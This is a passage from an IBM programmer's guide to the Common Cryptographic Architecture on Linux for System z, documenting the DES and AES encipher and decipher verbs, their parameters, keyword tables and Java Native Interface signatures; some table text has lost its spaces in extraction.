the third key +| The procedure is reversed to decipher data that has been triple-DES enciphered: +| v Decipher the data using the third key +| v Encipher the result using the second key +| v Decipher the second result using the first key +| Avariation of the triple-DES algorithm supports the use of a double-length DATAkey comprised of two +| 8-byte DATAkeys. In this method, the first 8-byte key is reused in the last encipherment step. +| Due to export regulations, triple-DES encryption might not be available on your processor. +212 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Decipher (CSNBDEC) +Decipher (CSNBDEC) +Use the Decipher verb to decipher data using the DES cipher block chaining mode. CCAsupports the +following processing rules to decipher data. You choose the type of processing rule that the Decipher verb +should use for block chaining. +Processing Rule Purpose +ANSI X9.23 For cipher block chaining. The ciphertext must be an exact multiple of +eight bytes, but the plaintext will be between 1 and 8 bytes shorter than +the ciphertext. The text_length will also be reduced to show the original +length of the plaintext. +Cipher Block Chaining (CBC) +The ciphertext must be an exact multiple of eight bytes and the plaintext +will have the same length. +Cryptographic Unit Support Program (CUSP) +CBC mode (cipher block chaining) that is compatible with IBM’s CUSP +and PCF products. The data need not be in exact multiples of eight bytes. +The ciphertext is the same length as the plaintext. +Information Protection System (IPS) +CBC mode (cipher block chaining) that is compatible with IBM’s IPS +product. The data need not be in exact multiples of eight bytes. The +ciphertext is the same length as the plaintext. +The cipher block chaining (CBC) mode uses an initial chaining value (ICV) in its processing. The first eight +bytes of ciphertext is deciphered and then the ICV is XORed with the resulting eight bytes of data to form +the first 8-byte block of plaintext. Thereafter, the 8-byte block of ciphertext is deciphered and XORed with +the previous 8-byte block of ciphertext until all the ciphertext is deciphered. +The selection between single-DES decryption mode and triple-DES decryption mode is controlled by the +length of the key supplied in the key_identifier parameter. If a single-length key is supplied, single-DES +decryption is performed. If a double-length or triple-length key is supplied, triple-DES decryption is +performed. +Adifferent ICV could be passed on each call to the Decipher verb. However, the same ICV that was used +in the corresponding Encipher verb must be passed. +Short blocks are text lengths of between one and seven bytes.Ashort block can be the only block. Trailing +short blocks are blocks of between one and seven bytes that follow an exact multiple of eight bytes. For +example, if the text length is 21, there are two 8-byte blocks and a trailing short block of five bytes. +Because the DES processes text only in exact multiples of eight bytes, some special processing is +required to decipher such short blocks. +These methods of treating short blocks and trailing short blocks do not increase the length of the +ciphertext compared to the length of the plaintext. If the plaintext was padded during encipherment, the +length of the ciphertext will always be an exact multiple of eight bytes. +CCAsupports theANSI X9.23 padding method. +Host CPU acceleration: CPACF +Only keys with a key type of DATAcan be used successfully with the CPACF exploitation layer through +this verb. Specifically, a DATAkey has a CV (Control Vector) of all X'00' bytes for all active bytes of the CV +(eight bytes for 8-byte DES keys, 16 bytes for 16-byte DES keys, and 16 bytes for 24-byte DES keys). +For details about CPACF, see “CPACF support” on page 8. +Chapter6.Protectingdata 213 + +Decipher (CSNBDEC) +Format +CSNBDEC( +return_code, +reason_code, +exit_data_length, +exit_data, +key_identifier, +text_length, +cipher_text, +initialization_vector, +rule_array_count, +rule_array, +chaining_vector, +clear_text ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_identifier +Direction: Input/Output Type: String +A64-byte string that is the internal key token containing the data-encrypting key or the label of a DES +key storage record containing a data-encrypting key to be used for deciphering the data. If the key +token or key label contains a single-length key, single-DES decryption is performed. If the key token or +key label contains a double-length or triple-length key, triple-DES decryption is performed. +Double length CIPHER and DECIPHER keys are also supported. +text_length +Direction: Input/Output Type: Integer +On entry, you supply the length of the ciphertext. The maximum length of text is 214,783,647 bytes.A +zero value for the text_length parameter is not valid. If the returned deciphered text (clear_text +parameter) is a different length because of the removal of padding bytes, the value is updated to the +length of the plaintext. +The application program passes the length of the ciphertext to the verb. The verb returns the length of +the plaintext to your application program. +cipher_text +Direction: Input Type: String +The text to be deciphered. +initialization_vector +Direction: Input Type: String +The 8-byte supplied string for the cipher block chaining. The first block of the ciphertext is deciphered +and XORed with the initial chaining vector (ICV) to get the first block of cleartext. The input block is +the next ICV. To decipher the data, you must use the same ICV used when you enciphered the data. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, or 3. +rule_array +214 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Decipher (CSNBDEC) +Direction: Input Type: String +An array of 8-byte keywords providing the processing control information. The array is positional. The +first keyword in the array is the processing rule. You choose the processing rule you want the verb to +use for deciphering the data. The second keyword is the ICV selection keyword. The third keyword (or +the second if the ICV selection keyword is allowed to default) is the encryption algorithm to use. The +rule_array keywords are described in Table54. +Table54.KeywordsforDeciphercontrolinformation +Keyword Description +ProcessingRule(One,required) +CBC PerformsANSIX3.102cipherblockchaining.Thedatamustbeamultipleofeightbytes.AnOCVis +producedandplacedinthechaining_vectorparameter.IftheICVselectionkeywordCONTINUEis +specified,theCBCOCVfromthepreviouscallisusedastheICVforthiscall. +CUSP PerformsCryptographicUnitSupportProgram(CUSP)cipherblockchaining. +IPS PerformsInformationProtectionSystem(IPS)cipherblockchaining. +X9.23 Decipherswithcipherblockchainingandtextlengthreducedtotheoriginalvalue.Thisiscompatible +withtherequirementsinANSIstandardX9.23.Theciphertextlengthmustbeanexactmultipleofeight +bytes.Paddingisremovedfromtheplaintext. +ICVSelection(One,optional) +CONTINUE Thisspecifiestakingtheinitializationvectorfromtheoutputchainingvector(OCV)containedinthe +workareatowhichthechaining_vectorparameterpoints.CONTINUEisvalidonlyfortheCBC +processingrule. +INITIAL Thisspecifiestakingtheinitializationvectorfromtheinitialization_vectorparameter.INITIAListhe +defaultvalue. +EncryptionAlgorithm(Optional) +DES Thisspecifiesusingthedataencryptionstandardandignoringthetokenmarking. +“Ciphering methods” on page 494 describes the cipher processing rules in detail. +chaining_vector +Direction: Input/Output Type: String +An 18-byte field CCAuses as a system work area. Your application program must not change the data +in this string. The chaining vector holds the output chaining vector (OCV) from the caller. The OCV is +the first eight bytes in the 18-byte string. +The direction is Output if the ICV selection keyword of the rule_array parameter is INITIAL. The +direction is Input/Output if the ICV selection keyword of the rule_array parameter is CONTINUE. +clear_text +Direction: Output Type: String +The field where the verb returns the deciphered text. +Restrictions +This verb will fail if the key token contains double or triple-length keys and triple-DES is not enabled. +Required commands +| This verb requires the Decipher - DES command (offset X'000F') to be enabled in the active role. +Usage notes +None +Chapter6.Protectingdata 215 + +Decipher (CSNBDEC) +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBDECJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBDECJ are shown here. +Format +public native void CSNBDECJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_identifier, +hikmNativeInteger text_length, +byte[] ciphertext, +byte[] initialization_vector, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] chaining_vector, +byte[] plaintext +); +216 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encipher (CSNBENC) +Encipher (CSNBENC) +Use the Encipher verb to encipher data using the DES cipher block chaining mode. CCAsupports the +following processing rules to encipher data. You choose the type of processing rule that the Encipher verb +should use for the block chaining. +Processing Rule Purpose +Cipher block chaining (CBC) In exact multiples of eight bytes. +Cryptographic Unit Support Program (CUSP) +CBC mode (cipher block chaining) that is compatible with IBM’s CUSP +and PCF products. The data need not be in exact multiples of eight bytes. +The ciphertext is the same length as the plaintext. +Information Protection System (IPS) +CBC mode (cipher block chaining) that is compatible with IBM’s IPS +product. The data need not be in exact multiples of eight bytes. The +ciphertext is the same length as the plaintext. +ANSI X9.23 For block chaining not necessarily in exact multiples of eight bytes. This +process rule pads the plaintext so that ciphertext produced is an exact +multiple of eight bytes. +For more information about the processing rules, see Table55 on page 219 and Ciphering methods. +The cipher block chaining (CBC) mode of operation uses an initial chaining vector (ICV) in its processing. +The ICV is XORed with the first eight bytes of plaintext before the encryption step and thereafter, the +8-byte block of ciphertext just produced is XORed with the next 8-byte block of plaintext and so on. This +disguises any pattern that might exist in the plaintext. +The selection between single-DES encryption mode and triple-DES encryption mode is controlled by the +length of the key supplied in the key_identifier parameter. If a single-length key is supplied, single-DES +encryption is performed. If a double-length or triple-length key is supplied, triple-DES encryption is +performed. +To nullify the CBC effect on the first 8-byte block, supply eight bytes of zero. However, the ICV might +require zeros. +Cipher block chaining also produces a resulting chaining value called the output chaining vector (OCV). +The application can pass the OCV as the ICV in the next encipher call. This results in record chaining. +Note that the OCV that results is the same, whether an Encipher or a Decipher verb was invoked, +assuming the same text, ICV, and key were used. +Short blocks are text lengths of between one and seven bytes.Ashort block can be the only block. Trailing +short blocks are blocks of between one and seven bytes that follow an exact multiple of eight bytes. For +example, if the text length is 21, there are two 8-byte blocks, and a trailing short block of five bytes. +An alternative method is to pad the plaintext and produce a ciphertext that is longer than the plaintext. The +plaintext can be padded with up to eight bytes using one of several padding methods. This padding +produces a ciphertext that is an exact multiple of eight bytes in length. +If the cleartext is already a multiple of eight, the ciphertext can be created using any processing rule. +Because of padding, the returned ciphertext length is longer than the provided plaintext; the text_length +parameter will have been modified. The returned ciphertext field should be eight bytes longer than the +length of the plaintext to accommodate the maximum amount of padding. +Chapter6.Protectingdata 217 + +Encipher (CSNBENC) +Attention: If you lose the data-encrypting key under which the data (plaintext) is enciphered, the data +enciphered under that key (ciphertext) cannot be recovered. +Host CPU acceleration: CPACF +Only keys with a key type of DATAcan be used successfully with the CPACF exploitation layer through +this verb. Specifically, a DATAkey has a CV (Control Vector) of all X'00' bytes for all active bytes of the CV +(eight bytes for 8-byte DES keys, 16 bytes for 16-byte DES keys, and 16 bytes for 24-byte DES keys). +For details about CPACF, see “CPACF support” on page 8. +Format +CSNBENC( +return_code, +reason_code, +exit_data_length, +exit_data, +key_identifier, +text_length, +clear_text, +initialization_vector, +rule_array_count, +rule_array, +pad_character, +chaining_vector, +cipher_text ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_identifier +Direction: Input/Output Type: String +A64-byte string that is the internal key token containing the data-encrypting key or the label of a DES +key storage record containing the data-encrypting key, to be used for encrypting the data. If the key +token or key label contains a single-length key, single-DES encryption is performed. If the key token or +key label contains a double-length or triple-length key, triple-DES encryption is performed. +Single and double-length CIPHER and ENCIPHER keys are also supported. +text_length +Direction: Input/Output Type: Integer +On entry, the length of the plaintext (clear_text parameter) you supply. The maximum length of text is +214,783,647 bytes.Azero value for the text_length parameter is not valid. If the returned enciphered +text (cipher_text parameter) is a different length because of the addition of padding bytes, the value is +updated to the length of the ciphertext. +The application program passes the length of the plaintext to the verb. This verb returns the length of +the ciphertext to the application program. +clear_text +Direction: Input Type: String +The text that is to be enciphered. +initialization_vector +Direction: Input Type: String +218 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encipher (CSNBENC) +The 8-byte supplied string for the cipher block chaining. The first eight bytes (or less) block of the data +is XORed with the ICV and then enciphered. The input block is enciphered and the next ICV is +created. You must use the same ICV to decipher the data. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, or 3. +rule_array +Direction: Input Type: String +An array of 8-byte keywords providing the processing control information. The array is positional. The +first keyword in the array is the processing rule. You choose the processing rule you want the verb to +use for enciphering the data. The second keyword is the ICV selection keyword. The third keyword (or +the second if the ICV selection keyword is allowed to default to INITIAL) is the encryption algorithm to +use. The rule_array keywords are described in Table55. +Table55.KeywordsforEnciphercontrolinformation +Keyword Description +ProcessingRule(One,required) +CBC PerformsANSIX3.102cipherblockchaining.Thedatamustbeamultipleofeightbytes.AnOCVis +producedandplacedinthechaining_vectorparameter.IftheICVselectionkeywordCONTINUEis +specified,theCBCOCVfromthepreviouscallisusedastheICVforthiscall. +CUSP PerformsCryptographicUnitSupportProgram(CUSP)cipherblockchaining. +IPS PerformsInformationProtectionSystem(IPS)cipherblockchaining. +X9.23 Performscipherblockchainingwith1-8bytesofpadding.Thisiscompatiblewiththerequirementsin +ANSIstandardX9.23.Ifthedataisnotinexactmultiplesofeightbytes,X9.23padstheplaintextsothe +ciphertextproducedisanexactmultipleofeightbytes.Theplaintextispaddedtothenextmultiple +eightbytes,evenifthisaddseightbytes.AnOCVisproduced. +ICVSelection(One,optional) +CONTINUE Thisspecifiestakingtheinitializationvectorfromtheoutputchainingvector(OCV)containedinthe +workareatowhichthechaining_vectorparameterpoints.CONTINUEisvalidonlyfortheCBC +processingrule. +INITIAL Thisspecifiestakingtheinitializationvectorfromtheinitialization_vectorparameter.INITIAListhe +defaultvalue. +EncryptionAlgorithm(Optional) +DES Thisspecifiesusingthedataencryptionstandardandignoringthetokenmarking. +“Ciphering methods” on page 494describes the cipher processing rules in detail. +pad_character +Direction: Input Type: Integer +An integer, 0 - 255, that is used as a padding character for the X9.23 process rule (rule_array +parameter). +chaining_vector +Direction: Input/Output Type: String +An 18-byte field CCAuses as a system work area. Your application program must not change the data +in this string. The chaining vector holds the output chaining vector (OCV) from the caller. The OCV is +the first eight bytes in the 18-byte string. +Chapter6.Protectingdata 219 + +Encipher (CSNBENC) +The direction is Output if the ICV selection keyword of the rule_array parameter is INITIAL. +The direction is Input/Output if the ICV selection keyword of the rule_array parameter is CONTINUE. +cipher_text +Direction: Output Type: String +The enciphered text the verb returns. The length of the ciphertext is returned in the text_length +parameter. The cipher_text could be eight bytes longer than the length of the clear_text field because +of the padding that is required for some processing rules. +Restrictions +This verb will fail if the key token contains double-length or triple-length keys and triple-DES is not +enabled. +Required commands +| This verb requires the Encipher - DES command (offset X'000E') to be enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBENCJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBENCJ are shown here. +Format +public native void CSNBENCJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_identifier, +hikmNativeInteger text_length, +byte[] plaintext, +byte[] initialization_vector, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger pad_character, +byte[] chaining_vector, +byte[] ciphertext +); +220 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Algorithm Decipher (CSNBSAD) +Symmetric Algorithm Decipher (CSNBSAD) +Use the SymmetricAlgorithm Decipher verb to decipher data using theAES cipher block chaining mode. +CCAsupports the following processing rules to decipher data. You choose the type of processing rule that +the verb should use for block chaining. +Cipher Block Chaining (CBC) +The plaintext must be an exact multiple of eight bytes, and the ciphertext will have the same length. +Electronic Code Book (ECB) +The plaintext length must be a multiple of the block size. +PKCS-PAD +The plaintext was padded on the right with 1 - 16 bytes of pad characters, making the padded text a +multiple of the block size. +TheAES key used to decipher the data can either be 16, 24, or 32 bytes (128, 192, or 256 bits) in length. +The key can be supplied to the verb in any of three forms: +1. Acleartext key consisting of only the key bytes, not contained in a key token. +2. Acleartext key contained in an internalAES key-token. +3. An encrypted key contained in an internalAES key-token, where the key is wrapped (encrypted) with +theAES master key. +To use this verb, specify: +v The rule_array: +1. The algorithm identifier keywordAES, which is the only symmetric algorithm currently supported. +2. An optional processing rule using keyword CBC (the default), ECB, or PKCS-PAD, which selects the +decryption mode. +3. An optional key rule using the keyword KEY-CLR (the default) or KEYIDENT, which selects whether +the key_identifier parameter points to a 16-byte, 24-byte, or 32-byte clear key, or a key contained in +a 64-byteAES key-token, either in application storage or in key storage. +4. An optional initial chaining value (ICV) selection using the keyword INITIAL(the default) or +CONTINUE, which indicates whether it is the first or a subsequent request, and which parameter +points to the initialization vector. +v For a key rule of KEY-CLR, a key identifier containing a 16-byte, 24-byte, or 32-byte clear key. For a +key rule of KEYIDENT, a 64-byte internalAES key-token or the key label of an internalAES key-token. +v Ablock size of 16 for the cryptographic algorithm. +v For cipher block chaining, either one of these: +1. For an ICV selection of INITIAL, a 16-byte initialization vector of your choosing and a 32-byte chain +data buffer. +2. For an ICV selection of CONTINUE, no initialization vector and the 32-byte chain data buffer from +the output of the previous chained call. The electronic code book algorithm does not use an +initialization vector or a chain data buffer. +v The ciphertext to be deciphered. +v Acleartext buffer large enough to receive the deciphered output. +This verb does the following when it deciphers the data: +1. Verifies theAES key-token for keyword KEYIDENT. +2. Verifies that the ciphertext length is a multiple of the block size. +3. Deciphers the inputAES key if the key is encrypted (MKVP was present in token). +4. Deciphers the ciphertext with theAES clear key according to the encryption mode specified. +5. Removes from 1 - 16 pad characters from the right of the clear data for keyword PKCS-PAD. +Chapter6.Protectingdata 221 + +Symmetric Algorithm Decipher (CSNBSAD) +6. Returns the cleartext data and its length. +7. Returns the chain data and its length if keyword ECB is not specified. +| Only keys with a key type of DATAcan be used successfully with the CPACF exploitation layer through +| this verb. Specifically, a DATAkey has a Control Vector (CV) of all X'00' bytes for all active bytes of the CV +| (eight bytes for allAES keys). Note that as of CCARelease 3.30 (the first release ofAES function on the +| CEX2C 4764 adapter) to Release 4.1.0 (the most recent release of CCAon the CEX3C feature),AES +| keys were only available as DATAkeys. For details about CPACF, see “CPACF support” on page 8. +Format +CSNBSAD( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_identifier_length, +key_identifier, +key_parms_length, +key_parms, +block_size, +initialization_vector_length, +initialization_vector, +chain_data_length, +chain_data, +ciphertext_length, +cipher_text, +cleartext_length, +cleartext, +optional_data_length, +optional_data ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, 3, or 4. +rule_array +Direction: Input Type:Array +An array of 8-byte keywords providing the processing control information. The keywords must be +left-justified and padded on the right with space characters. The rule_array keywords are described in +Table56. +Table56.KeywordsforSymmetricAlgorithmDeciphercontrolinformation +Keyword Description +Decryptionalgorithm(Onerequired) +AES SpecifiesuseoftheAdvancedEncryptionStandard(AES)asthedecipheringalgorithm.Theblocksize +forAESis16bytes,andthekeylengthis16,24,or32bytes.AESistheonlyalgorithmcurrently +supportedbythisverb. +Processingrule(One,optional) +222 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Algorithm Decipher (CSNBSAD) +Table56.KeywordsforSymmetricAlgorithmDeciphercontrolinformation (continued) +Keyword Description +CBC PerformsANSIX3.102cipherblockchaining.Thedatamustbeamultipleofeightbytes.AnOCVis +producedandplacedinthechaining_vectorparameter.IftheICVselectionkeywordCONTINUEis +specified,theCBCOCVfromthepreviouscallisusedastheICVforthiscall. +ECB SpecifiesdecipheringinElectronicCodeBookmode.Theciphertextlengthmustbeamultipleofthe +blocksize. +PKCS-PAD Specifiesthatthecleartextwaspaddedontherightwith1-16bytesofpadcharacters,makingthe +paddedtextamultipleoftheblocksize,beforethedatawasenciphered.Eachpadcharacterisvalued +tothenumberofpadcharactersadded. +Theoutputcleartextisstrippedofanypadcharactersandthecleartextlengthis1-16byteslessthan +theciphertextlength. +Keyrule(One,optional) +KEY-CLR Specifiesthatthekey_identifierparameterpointstoacleartextAESkey.Onlythekeyvalueisallowed; +thekeyisnotcontainedinakeytoken.Thisisthedefaultvalue. +KEYIDENT Specifiesthatthekey_identifierparameterpointstoaninternalAESkey-tokenorthelabelofan +internalkey-tokeninAESkey-storage. +ICVselection(One,optional) +CONTINUE Thisspecifiestakingtheinitializationvectorfromtheoutputchainingvector(OCV)containedinthe +workareatowhichthechaining_vectorparameterpoints.CONTINUEisvalidonlyfortheCBC +processingrule. +INITIAL Thisspecifiestakingtheinitializationvectorfromtheinitialization_vectorparameter.INITIAListhe +defaultvalue. +“Ciphering methods” on page 494 describes the cipher processing rules in detail. +key_identifier_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_identifier variable. +This value must be 16, 24, 32, or 64. +key_identifier +Direction: Input Type: String +Apointer to a string variable containing either a cleartextAES key or the internal key-token or a label +for an internal key-token record inAES key-storage. This is the key used to decipher the data pointed +to by the ciphertext parameter. +For rule_array keyword KEY-CLR, a 16-byte, 24-byte, or 32-byte clearAES key is required. For +rule_array keyword KEYIDENT, a 64-byte internal key-token or key label for an internal key-token +record inAES key-storage is required. +key_parms_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_parms parameter. +This value must be 0. +key_parms +Direction: Input Type: String +Apointer to a string variable for key-related parameters. It is currently unused. +block_size +Chapter6.Protectingdata 223 + +Symmetric Algorithm Decipher (CSNBSAD) +Direction: Input Type: Integer +Apointer to an integer variable containing the block size used by the cryptographic algorithm. This +value must be 16. +initialization_vector_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the initialization_vector +variable. For cipher block chaining with an INITIALICV selection, this value must be 16. For +processing rule ECB or ICV selection CONTINUE, this value should be 0. +initialization_vector +Direction: Input Type: String +Apointer to a string variable containing the initialization vector for the INITIALcall to CBC mode +encryption. It is not used if the process rule is ECB. The same initialization vector must have been +used to encipher the data. +chain_data_length +Direction: Input/Output Type: Integer +Apointer to an integer variable containing the number of bytes of data in the chain_data variable. On +input, this variable contains the length of the buffer provided and should have a value of 32 or greater +for CBC mode encryption, or 0 for ECB mode encryption. +On output, the variable is updated with the length of the data returned in the chain_data variable. The +chain_data_length parameter must not be changed by the calling application until chained operations +are complete. +chain_data +Direction: Input/Output Type: String +Apointer to a string variable used as a work area for CBC encipher requests. This work area is not +used for ECB mode encryption. When the verb performs a CBC decipher operation and the ICV +selection is INITIAL, the chain_data variable is an output-only buffer that receives data used as input +for deciphering the next part of the input data, if any. When the ICV selection is CONTINUE, the +chain_data variable is both an input and output buffer. The application must not change any +intermediate data in this string. +ciphertext_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the ciphertext variable. The +ciphertext_length value must be a multiple of the block size. This value must not be 0. If PKCS-PAD is +specified, the output cleartext_length variable will be 1 - 16 bytes less than the ciphertext_length +value. +ciphertext +Direction: Input Type: String +Apointer to a string variable containing the data to be deciphered, including any pad bytes. +cleartext_length +Direction: Input/Output Type: Integer +On input, this parameter is a pointer to an integer variable containing the number of bytes of data in +the cleartext variable. On output, this variable is updated to contain the actual length of text output in +the cleartext variable. If PKCS-PAD is specified, the cleartext value is updated with 1 - 16 bytes of +data less than the ciphertext_length value. +224 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Algorithm Decipher (CSNBSAD) +cleartext +Direction: Input/Output Type: String +Apointer to a string variable used to contain the data to be deciphered, excluding any pad bytes. +optional_data_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the optional_data variable. +This value should be 0. +optional_data +Direction: Input Type: String +Apointer to a string variable containing optional data for the decryption. It is currently not used. +Restrictions +None. +Required commands +| This verb requires the SymmetricAlgorithm Decipher - secureAES keys command (offset X'012B') to be +| enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBSADJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBSADJ are shown here. +Format +public native void CSNBSADJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger key_length, +byte[] key_identifier, +hikmNativeInteger key_parms_length, +byte[] key_parms, +hikmNativeInteger block_size, +hikmNativeInteger iv_length, +byte[] iv, +hikmNativeInteger chain_data_length, +byte[] chain_data, +hikmNativeInteger cipher_text_length, +byte[] cipher_text, +hikmNativeInteger clear_text_length, +byte[] clear_text, +hikmNativeInteger optional_data_length, +byte[] optional_data); +Chapter6.Protectingdata 225 + +Symmetric Algorithm Encipher (CSNBSAE) +Symmetric Algorithm Encipher (CSNBSAE) +Use the SymmetricAlgorithm Encipher verb to encipher data using theAES cipher block chaining mode. +CCAsupports the following processing rules to encipher data. You choose the type of processing rule that +the verb should use for block chaining. +Cipher Block Chaining (CBC) +The plaintext must be an exact multiple of eight bytes, and the ciphertext will have the same length. +Electronic Code Book (ECB) +The plaintext length must be a multiple of the block size. +PKCS-PAD +The plaintext was padded on the right with 1 - 16 bytes of pad characters, making the padded text a +multiple of the block size. +TheAES key used to encipher the data can either be 16, 24, or 32 bytes (128, 192, or 256 bits) in length. +The key can be supplied to the verb in any of three forms: +1. Acleartext key consisting of only the key bytes, not contained in a key token. +2. Acleartext key contained in an internalAES key-token. +3. An encrypted key contained in an internalAES key-token, where the key is wrapped (encrypted) with +theAES master key. +To use this verb, specify: +v The rule_array: +1. The algorithm identifier keywordAES, which is the only symmetric algorithm currently supported. +2. An optional processing rule using keyword CBC (the default), ECB, or PKCS-PAD, which selects the +encryption mode. +3. An optional key rule using the keyword KEY-CLR (the default) or KEYIDENT, which selects whether +the key_identifier parameter points to a 16-byte, 24-byte, or 32-byte clear key, or a key contained in +a 64-byteAES key-token, either in application storage or in key storage. +4. An optional ICV (initial chaining value) selection using the keyword INITIAL(the default) or +CONTINUE, which indicates whether it is the first or a subsequent request, and which parameter +points to the initialization vector. +v Akey identifier containing a 16-byte, 24-byte, or 32-byte clear key for a key rule of KEY-CLR, or a +64-byte internalAES key-token or the key label of an internalAES key-token for a key rule of +KEYIDENT. +v Ablock size of 16 for the cryptographic algorithm. +v For cipher block chaining, either one of these: +1. For an ICV selection of INITIAL, a 16-byte initialization vector of your choosing and a 32-byte chain +data buffer. +2. For an ICV selection of CONTINUE, no initialization vector and the 32-byte chain data buffer from +the output of the previous chained call. The electronic code book algorithm does not use an +initialization vector or a chain data buffer. +v The cleartext to be enciphered. +v Aciphertext buffer large enough to receive the enciphered output. +This verb does the following when it enciphers the data: +1. Verifies theAES key-token for keyword KEYIDENT. +2. Deciphers the inputAES key if the key is encrypted (MKVP was present in token). +3. Pads the cleartext data with 1 - 16 bytes on the right for keyword PKCS-PAD, otherwise verifies that +the cleartext length is a multiple of the block size. +226 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Algorithm Encipher (CSNBSAE) +4. Enciphers the cleartext, including any pad characters, with theAES clear key according to the +encryption mode specified. +5. Returns the ciphertext data and its length. +6. Returns the chain data and its length if keyword ECB is not specified. +| Only keys with a key type of DATAcan be used successfully with the CPACF exploitation layer through +| this verb. Specifically, a DATAkey has a Control Vector (CV) of all X'00' bytes for all active bytes of the CV +| (eight bytes for allAES keys). Note that as of CCARelease 3.30 (the first release ofAES function on the +| CEX2C 4764 adapter) to Release 4.1.0 (the most recent release of CCAon the CEX3C adapter),AES +| keys were only available as DATAkeys. For details about CPACF, see “CPACF support” on page 8. +Format +CSNBSAE( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +key_identifier_length, +key_identifier, +key_parms_length, +key_parms, +block_size, +initialization_vector_length, +initialization_vector, +chain_data_length, +chain_data, +cleartext_length, +cleartext, +ciphertext_length, +cipher_text, +optional_data_length, +optional_data ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1, 2, 3, or 4. +rule_array +Direction: Input Type:Array +Apointer to a string variable containing an array of keywords. The keywords are eight bytes in length, +and must be left-justified and padded on the right with space characters. The rule_array keywords are +described in Table57. +Table57.KeywordsforSymmetricAlgorithmEnciphercontrolinformation +Keyword Description +Encryptionalgorithm(Required) +Chapter6.Protectingdata 227 + +Symmetric Algorithm Encipher (CSNBSAE) +Table57.KeywordsforSymmetricAlgorithmEnciphercontrolinformation (continued) +Keyword Description +AES SpecifiesuseoftheAdvancedEncryptionStandard(AES)astheencryptionalgorithm.Theblocksize +forAESis16bytes,andthekeylengthis16,24,or32bytes.AESistheonlyalgorithmcurrently +supportedbythisverb. +Processingrule(One,optional) +CBC PerformsANSIX3.102cipherblockchaining.Thedatamustbeamultipleofeightbytes.AnOCVis +producedandplacedinthechaining_vectorparameter.IftheICVselectionkeywordCONTINUEis +specified,theCBCOCVfromthepreviouscallisusedastheICVforthiscall. +ECB SpecifiesencipheringinElectronicCodeBookmode.Thecleartextlengthmustbeamultipleofthe +blocksize. +PKCS-PAD Specifiespaddingofthecleartextontherightwith1-16bytesofpadcharacters,makingthepadded +textamultipleoftheblocksize.Eachpadcharacterisvaluedtothenumberofpadcharactersadded. +Theciphertextlengthmustbelargeenoughtoincludetheaddedpadcharacters. +Keyrule(One,optional) +KEY-CLR Specifiesthatthekey_identifierparameterpointstoacleartextAESkey.Onlythekeyvalueisallowed; +thekeyisnotcontainedinakeytoken.Thisisthedefaultvalue. +KEYIDENT Specifiesthatthekey_identifierparameterpointstoaninternalAESkey-tokenorthelabelofan +internalkey-tokeninAESkey-storage. +ICVselection(One,optional) +CONTINUE Specifiestakingtheinitializationvectorfromtheoutputchainingvector(OCV)containedinthework +areatowhichthechaining_vectorparameterpoints.CONTINUEisvalidonlyfortheCBCprocessing +rule. +INITIAL Specifiestakingtheinitializationvectorfromtheinitialization_vectorparameter.INITIAListhedefault +value. +“Ciphering methods” on page 494 describes the cipher processing rules in detail. +key_identifier_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_identifier variable. +This value must be 16, 24, 32, or 64. +key_identifier +Direction: Input Type: String +Apointer to a string variable containing either a cleartextAES key or the internal key-token or a label +for an internal key-token record inAES key-storage. This is the key used to encipher the data pointed +to by the cleartext parameter. For rule_array keyword KEY-CLR, a 16-byte, 24-byte, or 32-byte 